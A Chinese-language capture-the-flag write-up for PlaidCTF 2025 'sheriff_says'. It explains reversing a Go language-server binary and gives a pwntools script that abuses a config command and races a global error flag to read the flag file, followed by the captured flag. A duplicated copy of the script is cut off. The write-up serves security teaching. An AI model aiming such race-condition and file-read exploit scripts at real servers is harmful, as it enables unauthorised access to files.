-
-
[原创]plaidctf 2025 sheriff_says wp
-
发表于: 2025-4-16 22:05 5192
-
我不语,只是一遍又一遍重复河豚鱼的教诲。
借此题,总结一下go逆向的技巧。
使用neovim与go语言实现的lsp(language server protocol)服务端交互,核心在于lsp server(go 实现)的逆向
lsp协议的的处理逻辑在这
下面的runtime_newobject就没有恢复返回值导致下面的v367飘红
由于go的函数调用的寄存器使用顺序 RAX、RBX、RCX、RDI、RSI、R8、R9、R10、R11
RDX用作闭包上下文的指针
go语言的函数开头都会插入栈检查代码,可以根据这个特征识别真正的参数,如这里就是rax一个参数
ida没有识别到返回值,而且go是支持多返回值的,有个大力出奇迹的方法,那就是把返回值修改为_OWORD, 返回两个返回值的函数是比较多的。
而且,据我观察函数中没有用的到倒数的参数,一般就是返回值,如这里的runtime_newobject()中的void *r0就是返回值。
修复后:好看很多(只修改函数签名还不够,还要在被调用出修改call type)
程序匹配method的长度,使用switch case匹配,关键点在workspace/executeCommand
其支持两个command:
通过逆向wildwest.loadNewConfig负责更新配置文件,如果配置文件设置了usefilesyetem为true,则会进入打开flag的逻辑。
其参数可以在其local type中看出来,
知道config需要这四个参数,但是还要确定其传参的格式,在main_loadNewConfigReflectively中
调用reflect_value_elem,reflect_value_fieldByName来反射
最后查看Argument的类型是个slice知道穿的是数组
最后确定了格式:
对于wildwest.quickDraw,传的也是三个参数,程序会检查三个参数的类型,依次是string,float,string,分别对应文件名,文件行,第三个string没有用到。
如果quickDraw传入的文件名包括’flag’,则传入main.err
在后面会检查main.err 如果有 则退出 代码运行不到 readFileConrtent
但是观察到这里面有个大循环,故意拖时间,可以main.err是个全局变量,所以这里有个条件竞争。
在initialize中,会将main.err置空,所以需要另外启动一个客户端去竞争,把main.err置空
在quickDraw中,会检查修复的修复的次数,必须修复过warning才可以
所以在didopen的时候传入会warning的文本
然后再didchange传入修复好的文本就可以了
[{
"EnforcePrefix"
:
False
,
"RequiredPrefix"
:
"sheriff_says_"
,
"MinimumNameLength"
:
1
,
"UseFileSystem"
:
True
}]
[{
"EnforcePrefix"
:
False
,
"RequiredPrefix"
:
"sheriff_says_"
,
"MinimumNameLength"
:
1
,
"UseFileSystem"
:
True
}]
from
pwn
import
*
import
time
import
json
import
socket
from
typing
import
Dict
,
Any
class
SimpleLSClient:
def
__init__(
self
, host:
str
=
'localhost'
, port:
int
=
9999
):
"""初始化 LSP 客户端"""
self
.host
=
host
self
.port
=
port
self
.socket
=
None
self
.request_id
=
0
context.log_level
=
'debug'
def
connect(
self
):
"""建立 socket 连接"""
try
:
self
.socket
=
remote(
self
.host,
self
.port)
except
Exception as e:
print
(f
"连接失败: {e}"
)
def
disconnect(
self
):
"""关闭连接"""
if
self
.socket:
self
.socket.close()
print
(
"连接已关闭"
)
def
build_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
str
:
"""构建 LSP 请求"""
self
.request_id
+
=
1
request
=
{
"jsonrpc"
:
"2.0"
,
"id"
:
self
.request_id,
"method"
: method,
"params"
: params
or
{}
}
# 转换为 JSON 并添加 Content-Length 头
content
=
json.dumps(request)
header
=
f
"Content-Length: {len(content)}\r\n\r\n"
return
header
+
content
def
send_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
Dict
[
str
,
Any
]:
"""发送请求并接收响应"""
if
not
self
.socket:
raise
ConnectionError(
"未连接到服务器"
)
# 构建并发送请求
request
=
self
.build_request(method, params)
self
.socket.send(request.encode(
'utf-8'
))
# 接收响应
response
=
self
.receive_response()
return
response
def
receive_response(
self
)
-
>
Dict
[
str
,
Any
]:
"""接收并解析服务器响应"""
# 首先读取 header
header
=
""
while
'\r\n\r\n'
not
in
header:
header
+
=
self
.socket.recv(
1
).decode(
'utf-8'
)
# 解析 Content-Length
content_length
=
int
(header.split(
'Content-Length: '
)[
1
].split(
'\r\n'
)[
0
])
# 读取响应内容
content
=
b""
while
len
(content) < content_length:
content
+
=
self
.socket.recv(content_length
-
len
(content))
return
json.loads(content.decode())
def
make_initialize_request(client):
init_params
=
{
"processId"
:
None
,
"rootUri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says"
,
"capabilities"
: {
"textDocument"
: {
"Completion"
: {
"CompletionItem"
: {
"sSnippetSupport"
:
True
}
}
}
},
"clientinfo"
:{
"name"
:
"neovim"
,
'version'
:
"1"
}
}
response
=
client.send_request(
"initialize"
, init_params)
print
(
"Initialize 响应:"
, json.dumps(response, indent
=
2
))
# client.send_request("initialized", {})
def
make_did_open_request(client,code):
did_open_params
=
{
"textDocument"
: {
"uri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go"
,
"text"
: code
}
}
response
=
client.send_request(
"textDocument/didOpen"
, did_open_params)
print
(
"DidOpen 响应:"
, json.dumps(response, indent
=
2
))
def
make_did_change_request(client,code):
did_change_params
=
{
"textDocument"
: {
"uri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says/test.go"
,
},
"contentChanges"
: [
{
"text"
: code
}
]
}
response
=
client.send_request(
"textDocument/didChange"
, did_change_params)
print
(
"DidChange 响应:"
, json.dumps(response, indent
=
2
))
def
make_execute_command_request(client,command,args):
print
(command)
execute_command_params
=
{
"command"
: command,
"arguments"
: args
}
response
=
client.send_request(
"workspace/executeCommand"
, execute_command_params)
print
(
"ExecuteCommand 响应:"
, json.dumps(response, indent
=
2
))
go_code
=
'''// test.go
package main
import "fmt"
func test1() {
wr_bronco_sheriff := 1
return wr_bronco_sheriff
// this is a comment
}
'''
go_rename_code
=
'''// test.go
package main
import "fmt"
func sheriff_says_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa() {
wr_bronco_sheriff := 1
return wr_bronco_sheriff
// this is a comment
}
'''
def
main():
# 创建客户端实例
client
=
SimpleLSClient(
'54.221.151.72'
,
7010
)
# 连接到服务器
client.connect()
client2
=
SimpleLSClient(
'54.221.151.72'
,
7010
)
client2.connect()
# try:
make_initialize_request(client)
make_did_open_request(client, go_code)
make_did_change_request(client, go_rename_code)
make_execute_command_request(client,
"wildwest.loadNewConfig"
, [
{
"EnforcePrefix"
:
False
,
"RequiredPrefix"
:
"sheriff_says_a"
,
"MinimumNameLength"
:
1
,
"UseFileSystem"
:
True
},
0
,
0
])
make_execute_command_request(client,
"wildwest.quickDraw"
,[
'flag'
,
0.0
,''])
make_initialize_request(client2)
print
(client.socket.recv())
client.socket.interactive()
# time.sleep(2)
# except Exception as e:
# print(f"错误: {e}")
# finally:
# client.disconnect()
if
__name__
=
=
"__main__"
:
main()
# PCTF{sh3riFF_$4y$_y0uR_c0D3_1$_cL34N_dd323724983c}
from
pwn
import
*
import
time
import
json
import
socket
from
typing
import
Dict
,
Any
class
SimpleLSClient:
def
__init__(
self
, host:
str
=
'localhost'
, port:
int
=
9999
):
"""初始化 LSP 客户端"""
self
.host
=
host
self
.port
=
port
self
.socket
=
None
self
.request_id
=
0
context.log_level
=
'debug'
def
connect(
self
):
"""建立 socket 连接"""
try
:
self
.socket
=
remote(
self
.host,
self
.port)
except
Exception as e:
print
(f
"连接失败: {e}"
)
def
disconnect(
self
):
"""关闭连接"""
if
self
.socket:
self
.socket.close()
print
(
"连接已关闭"
)
def
build_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
str
:
"""构建 LSP 请求"""
self
.request_id
+
=
1
request
=
{
"jsonrpc"
:
"2.0"
,
"id"
:
self
.request_id,
"method"
: method,
"params"
: params
or
{}
}
# 转换为 JSON 并添加 Content-Length 头
content
=
json.dumps(request)
header
=
f
"Content-Length: {len(content)}\r\n\r\n"
return
header
+
content
def
send_request(
self
, method:
str
, params:
Dict
[
str
,
Any
]
=
None
)
-
>
Dict
[
str
,
Any
]:
"""发送请求并接收响应"""
if
not
self
.socket:
raise
ConnectionError(
"未连接到服务器"
)
# 构建并发送请求
request
=
self
.build_request(method, params)
self
.socket.send(request.encode(
'utf-8'
))
# 接收响应
response
=
self
.receive_response()
return
response
def
receive_response(
self
)
-
>
Dict
[
str
,
Any
]:
"""接收并解析服务器响应"""
# 首先读取 header
header
=
""
while
'\r\n\r\n'
not
in
header:
header
+
=
self
.socket.recv(
1
).decode(
'utf-8'
)
# 解析 Content-Length
content_length
=
int
(header.split(
'Content-Length: '
)[
1
].split(
'\r\n'
)[
0
])
# 读取响应内容
content
=
b""
while
len
(content) < content_length:
content
+
=
self
.socket.recv(content_length
-
len
(content))
return
json.loads(content.decode())
def
make_initialize_request(client):
init_params
=
{
"processId"
:
None
,
"rootUri"
:
"file:///mnt/e/CTF/plaidctf2025/sheriff_says"
,